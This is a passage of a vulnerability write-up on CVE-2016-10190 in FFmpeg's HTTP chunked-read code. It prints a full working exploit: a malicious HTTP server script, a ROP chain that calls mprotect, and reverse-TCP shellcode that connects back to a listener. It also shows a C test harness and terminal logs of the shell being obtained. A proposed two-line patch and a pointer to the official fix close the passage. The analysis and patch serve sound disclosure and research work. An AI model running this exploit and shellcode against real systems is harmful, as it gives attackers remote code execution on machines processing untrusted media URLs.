    for counter, i in enumerate(chunks(data, 8)):
        ropchain += p64(pop_rsi)       # Pop the target address into RSI
        ropchain += p64(address_base + (counter * 8)) # Calculate the target
        ropchain += p64(pop_rdx)       # Pop the 8 bytes of data into RDX
        ropchain += i.ljust(8, "\x90") # Make sure the data is aligned on 8 bytes
        ropchain += p64(write_gadget)  # Trigger the write

    return ropchain

def main():
    ...
    # The main ROP chain
    # This will do the following things:
    #  1. mprotect(mprotect_segment, 0x500, PROT_READ | PROT_WRITE | PROT_EXEC)
    #  2. copy shellcode into shellcode_segment
    #  3. jump to shellcode

    # Setup mprotect ROP chain
    payload += p64(pop_rdi)          # Pop the first argument into RDI
    payload += p64(mprotect_segment)
    payload += p64(pop_rsi)          # Pop the second argument into RSI
    payload += p64(mprotect_size)
    payload += p64(pop_rdx)          # Pop the third argument into RDX
    payload += p64(mprotect_prot)
    payload += p64(mprotect_plt)     # Run the mprotect function

    # Write the shellcode into our newly mprotected segment
    payload += generate_mov(mprotect_segment, shellcode)

    # Jump to shellcode
    payload += p64(mprotect_segment)
    ...

Picking the Shellcode

An x86-64 reverse TCP shell by Russell Willis (Shellstorm Link) was chosen for adaptation. A test harness was setup:

#include <stdio.h>

#define IPADDR "\x7f\x01\x01\x01" /* 127.1.1.1 */
#define PORT "\x05\x39" /* 1337 */

unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";

int
main(void)
{
    printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}

The test harness has to be compiled with the -z execstack flag to allow calling into the shellcode.

$ gcc -zexecstack -o reverseshell reverseshell.c
$

To test this out, we can start a netcat listener on port 1337 and run the harness.

$ ./reverseshell
Shellcode Length: 118

On the netcat end:

$ nc -l -v -p 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [127.0.0.1] port 1337 [tcp/*] accepted (family 2, sport 44496)
id
uid=1000(ubuntu) gid=1000(ubuntu)
groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),
30(dip),44(video),46(plugdev),109(netdev),110(lxd)
uname -a
Linux ubuntu-xenial 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC
2017 x86_64 x86_64 x86_64 GNU/Linux
^C

Now we can just convert this into python:

# Reverse Shell TCP Shellcode adapted from Russell Willis

ip_addr = "127.1.1.1"
ip_addr_packed = socket.inet_aton(ip_addr)
port = 1337
port_packed = p16(port, endian="big")
shellcode = (
        "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
        "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
        "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
        "\x02"+ port_packed + "\xc7\x44\x24\x04" + ip_addr_packed+
        "\x48\x89\xe6\x6a\x10" +
        "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
        "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
        "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
        "\x5f\x6a\x3b\x58\x0f\x05")

Getting the Shell

Now we can compile everything we have into a working exploit:

#!/usr/bin/python

from pwn import *
import time
import socket

# HTTP Headers

headers = """HTTP/1.1 200 OK
Server: PwnServ/v1.0
Date: Sun, 11 Mar 1994 13:37:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked

"""

# Reverse Shell TCP Shellcode adapted from Russell Willis

ip_addr = "127.1.1.1"
ip_addr_packed = socket.inet_aton(ip_addr)
port = 1337
port_packed = p16(port, endian="big")
shellcode = (
        "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +
        "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +
        "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +
        "\x02"+ port_packed + "\xc7\x44\x24\x04" + ip_addr_packed+
        "\x48\x89\xe6\x6a\x10" +
        "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +
        "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +
        "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +
        "\x5f\x6a\x3b\x58\x0f\x05")

# ROP Gadgets

pop_rsp = 0x00000000004077e9     # pop rsp; ret;
stack_pivot = 0x000000000049daa9 # add rsp, 0x58; ret;
push_rbx_jmp_rdi = 0x000000000117fc75 # push rbx; jmp rdi;

mprotect_segment = 0x01646000
mprotect_size = 0x500
mprotect_prot = 0x1 | 02 | 0x4

pop_rdi = 0x0000000000407c39
pop_rsi = 0x0000000000408b2c
pop_rdx = 0x0000000000408859

write_gadget = 0x0000000000422544 # mov qword ptr [rsi], rdx; ret;

mprotect_plt = 0x4071f0


def generate_mov(address_base, data):
    """Move data into memory startng at the given address_base with a write
    gadget."""

    def chunks(l, n):
        """Yield successive n-sized chunks from l."""
        for i in range(0, len(l), n):
            yield l[i:i + n]

    ropchain = ""
    for counter, i in enumerate(chunks(data, 8)):
        ropchain += p64(pop_rsi)       # Pop the target address into RSI
        ropchain += p64(address_base + (counter * 8)) # Calculate the target
        ropchain += p64(pop_rdx)       # Pop the 8 bytes of data into RDX
        ropchain += i.ljust(8, "\x90") # Make sure the data is aligned on 8 bytes
        ropchain += p64(write_gadget)  # Trigger the write

    return ropchain


def main():
    # Start a listener and wait for a connection from ffmpeg
    p = listen(12345)

    # Start a second listener for the reverse shell
    rev = listen(port)

    # Wait for connection before sending payload
    log.info("Waiting for the victim...")
    p.wait_for_connection()
    log.success("Victim found!")

    # Initialise the ffmpeg instance and prepare it for the bug
    p.send(headers)

    # Trigger the bug with the overly large read
    p.sendline("-1")
    log.info("Bug triggered. Please wait for two seconds...")
    time.sleep(2)   # The sleep allows for a clean transmission boundary

    payload  = "A" * 0x8060     # Padding to start of AVIOContext struct

    # Setup the fake AVIOContext struct for the pivot into attacker controlled
    # memory

    payload += p64(stack_pivot) # [av_class] Pivot stack into controlled m. (3)
    payload += ("A"*8) * 4      # [buffer, buffer_size, buf_ptr, buf_end]
    payload += p64(pop_rsp)     # [opaque] Value in RDI at (1). (2)

    payload += p64(push_rbx_jmp_rdi) # [read_packet] initial RIP control (1)

    payload += ("X"*8) * 3      # [write_packet, seek, pos]
    payload += "AAAA"           # [must_flush]
    payload += p32(0)           # [eof_reached] Must be zero or read terminates
    payload += "A" * 8          # [write_flag, max_packet_size]
    payload += p64(stack_pivot) # [checksum] One more stack pivot (4)
    payload += ("A"*8) * 11     # Padding to set up the stack for the main ROP

    # The main ROP chain
    # This will do the following things:
    #  1. mprotect(mprotect_segment, 0x500, PROT_READ | PROT_WRITE | PROT_EXEC)
    #  2. copy shellcode into shellcode_segment
    #  3. jump to shellcode

    # Setup mprotect ROP chain
    payload += p64(pop_rdi)          # Pop the first argument into RDI
    payload += p64(mprotect_segment)
    payload += p64(pop_rsi)          # Pop the second argument into RSI
    payload += p64(mprotect_size)
    payload += p64(pop_rdx)          # Pop the third argument into RDX
    payload += p64(mprotect_prot)
    payload += p64(mprotect_plt)     # Run the mprotect function

    # Write the shellcode into our newly mprotected segment
    payload += generate_mov(mprotect_segment, shellcode)

    # Jump to shellcode
    payload += p64(mprotect_segment)

    # Send the entire payload
    log.info("Payload sent!")
    p.send(payload)

    # Close the socket to terminate the read on the ffmpeg end to process the
    # shellcode
    p.close()

    # Wait for reverse shell
    log.info("Please wait for your reverse shell.")
    rev.wait_for_connection()
    log.success("Success! Enjoy your shell!")
    rev.interactive()


if __name__ == '__main__':
    main()

To demonstrate that it works we will run the exploit.py script on one terminal to set up the listeners that will deliver the payload and to receive the reverse shell.

$ python exploit.py
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 127.0.0.1 on
    port 59164
[+] Trying to bind to 0.0.0.0 on port 1337: Done
[+] Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on
    port 44406
[*] Waiting for the victim...

On another terminal, we will run ffmpeg with parameters to connect to our listener.

$ ./ffmpeg_debug -i http://127.0.0.1:12345 test.avi
ffmpeg version 3.2.1 Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.4) 20160609
  configuration: --prefix=/home/ubuntu/ffmpeg_build
  --bindir=/home/ubuntu/ffmpeg_bin --disable-stripping
  libavutil      55. 34.100 / 55. 34.100
  libavcodec     57. 64.101 / 57. 64.101
  libavformat    57. 56.100 / 57. 56.100
  libavdevice    57.  1.100 / 57.  1.100
  libavfilter     6. 65.100 /  6. 65.100
  libswscale      4.  2.100 /  4.  2.100
  libswresample   2.  3.100 /  2.  3.100

Back at the exploit script terminal, we can see that the connection has been established, payload has been delivered, and the reverse shell has been started.

[+] Victim found!
[*] Bug triggered. Please wait for two seconds...
[*] Payload sent!
[*] Closed connection to 127.0.0.1 port 59164
[*] Please wait for your reverse shell.
[+] Success! Enjoy your shell!
[*] Switching to interactive mode
$ uname -a
Linux ubuntu-xenial 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC
2017 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),
24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),
109(netdev),110(lxd)
$ echo pwned!
pwned!
$

An asciinema demo may be found at this link: https://asciinema.org/a/6tSnpYAqdUqsvtLhFb7iwxIRT.

Part 3: The Patch

The Simple Patch

This report suggests a simple two-liner solution. The http_read_stream function contains the original code:

1250     if (s->chunksize >= 0) {
1251         if (!s->chunksize) {
1252             char line[32];
1253
1254                 do {
1255                     if ((err = http_get_line(s, line, sizeof(line))) < 0)
1256                         return err;
1257                 } while (!*line);    /* skip CR LF from last chunk */
1258
1259                 s->chunksize = strtoll(line, NULL, 16);
1260

1263
1264                 if (!s->chunksize)
1265                     return 0;
1266         }
1267         size = FFMIN(size, s->chunksize);
1268     }

The suggested patch would be to modify it so that it checks for negative values before assigning the size with FFMIN.

1250     if (s->chunksize >= 0) {
1251         if (!s->chunksize) {
1252             char line[32];
1253
1254                 do {
1255                     if ((err = http_get_line(s, line, sizeof(line))) < 0)
1256                         return err;
1257                 } while (!*line);    /* skip CR LF from last chunk */
1258
1259                 s->chunksize = strtoll(line, NULL, 16);
1260

1263
1264                 if (!s->chunksize)
1265                     return 0;
1266         }
1267
1268         if (s->chunksize > 0) {
1269                 size = FFMIN(size, s->chunksize);
1270         }
1271     }

The diff output between the original code and the patched code:

1267c1267,1270
<         size = FFMIN(size, s->chunksize);
---
>
>     if (s->chunksize > 0) {
>             size = FFMIN(size, s->chunksize);
>     }

We can test the solution by running the crash script from the demonstration section again.

$ python crash.py
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 127.0.0.1 on
    port 59254
[+] Victim found!
[*] Bug triggered. Please wait for two seconds...
[*] Payload sent!
[*] Closed connection to 127.0.0.1 port 59254

Running the patched ffmpeg shows that the vulnerability no longer occurs.

$ ./ffmpeg-patched -i http://127.0.0.1:12345 test.avi
ffmpeg version 3.2.1 Copyright (c) 2000-2016 the FFmpeg developers
  built with gcc 5.4.0 (Ubuntu 5.4.0-6ubuntu1~16.04.4) 20160609
  configuration: --prefix=/home/ubuntu/patched/ffmpeg_build
                 --bindir=/home/ubuntu/patched/ffmpeg_bin --disable-stripping
  libavutil      55. 34.100 / 55. 34.100
  libavcodec     57. 64.101 / 57. 64.101
  libavformat    57. 56.100 / 57. 56.100
  libavdevice    57.  1.100 / 57.  1.100
  libavfilter     6. 65.100 /  6. 65.100
  libswscale      4.  2.100 /  4.  2.100
  libswresample   2.  3.100 /  2.  3.100
http://127.0.0.1:12345: Connection reset by peer

The Official Patch

The official patch can be found in commit 2a05c8f813de6f2278827734bf8102291e7484aa in the FFmpeg github repository. The developers’ solution was to make all length and offset related variables unsigned to prevent the type confusion issues from occuring.

References

  • http://www.openwall.com/lists/oss-security/2017/02/02/1
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10190
  • https://trac.ffmpeg.org/wiki/CompilationGuide/Ubuntu
  • http://seclists.org/oss-sec/2017/q1/276
  • https://security.tencent.com/index.php/blog/msg/116
  • http://shell-storm.org/shellcode/files/shellcode-857.php

Leave a Comment